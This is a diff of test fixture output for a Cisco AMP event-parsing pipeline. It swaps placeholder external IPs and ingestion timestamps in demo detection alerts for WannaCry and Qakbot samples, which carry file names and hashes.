"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229322845880000,\"timestamp\":1610635263,\"timestamp_nanoseconds\":950000000,\"date\":\"2021-01-14T14:41:03+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1496,7 +1496,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -1541,7 +1541,7 @@ "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1551,8 +1551,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:28.103752188Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":913000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411488666497056775\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", + "ingested": "2021-12-09T13:35:51.461555300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":913000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411488666497056775\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "code": "2164260893", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -1572,7 +1572,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1617,7 +1617,7 @@ "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1627,8 +1627,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:28.103754226Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":913000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411488666497056774\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", + "ingested": "2021-12-09T13:35:51.461561100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":913000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411488666497056774\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "code": "2164260893", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -1648,7 +1648,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1693,7 +1693,7 @@ "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1703,8 +1703,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:28.103756251Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":913000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411488666497056773\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", + "ingested": "2021-12-09T13:35:51.461566900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":913000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411488666497056773\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "code": "553648155", "kind": "alert", "action": "Retrospective Quarantine", @@ -1724,7 +1724,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1767,7 +1767,7 @@ "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1781,8 +1781,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:28.103758284Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":398000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.DD6D4FEDD3-100.SBX.TG\",\"detection_id\":\"6411488666497056775\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"qYf.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\qYf.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", + "ingested": "2021-12-09T13:35:51.461572500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":398000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.DD6D4FEDD3-100.SBX.TG\",\"detection_id\":\"6411488666497056775\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"qYf.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\qYf.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -1804,7 +1804,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1847,7 +1847,7 @@ "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1861,8 +1861,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:28.103760323Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":398000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.DD6D4FEDD3-100.SBX.TG\",\"detection_id\":\"6411488666497056774\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"4191700.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\4191700.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", + "ingested": "2021-12-09T13:35:51.461578400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":398000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.DD6D4FEDD3-100.SBX.TG\",\"detection_id\":\"6411488666497056774\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"4191700.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\4191700.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -1884,7 +1884,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1931,7 +1931,7 @@ "8cf0ca99a8f5019d8583133b9a9379299c45470c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1945,8 +1945,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:28.103762465Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":398000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.DD6D4FEDD3-100.SBX.TG\",\"detection_id\":\"6411488666497056773\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\",\"sha1\":\"8cf0ca99a8f5019d8583133b9a9379299c45470c\",\"md5\":\"6894b3834bd541fa85df79e44568acac\"}}}}", + "ingested": "2021-12-09T13:35:51.461584400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":398000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.DD6D4FEDD3-100.SBX.TG\",\"detection_id\":\"6411488666497056773\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\",\"sha1\":\"8cf0ca99a8f5019d8583133b9a9379299c45470c\",\"md5\":\"6894b3834bd541fa85df79e44568acac\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -1968,7 +1968,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2016,7 +2016,7 @@ "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2026,8 +2026,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-30T00:15:28.103764481Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1493058569636000800,\"timestamp\":1610633340,\"timestamp_nanoseconds\":636000000,\"date\":\"2021-01-14T14:09:00+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Critical\",\"start_timestamp\":1610633340,\"start_date\":\"2021-01-14T14:09:00+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.\",\"short_description\":\"W32.Qakbot.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/Windows/SysWOW64/cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c3eea0c27244f91cce86d57aca2b3f8d09f1dbd6274751226c6b09398a7ba4\"}}}}}", + "ingested": "2021-12-09T13:35:51.461608Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1493058569636000800,\"timestamp\":1610633340,\"timestamp_nanoseconds\":636000000,\"date\":\"2021-01-14T14:09:00+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Critical\",\"start_timestamp\":1610633340,\"start_date\":\"2021-01-14T14:09:00+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.\",\"short_description\":\"W32.Qakbot.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/Windows/SysWOW64/cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c3eea0c27244f91cce86d57aca2b3f8d09f1dbd6274751226c6b09398a7ba4\"}}}}}", "code": "1107296274", "kind": "alert", "start": "2021-01-14T14:09:00.000Z", @@ -2048,7 +2048,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -2096,7 +2096,7 @@ "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2106,8 +2106,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:28.103766506Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264772016730014000,\"timestamp\":1610631960,\"timestamp_nanoseconds\":611000000,\"date\":\"2021-01-14T13:46:00+00:00\",\"event_type\":\"Retrospective 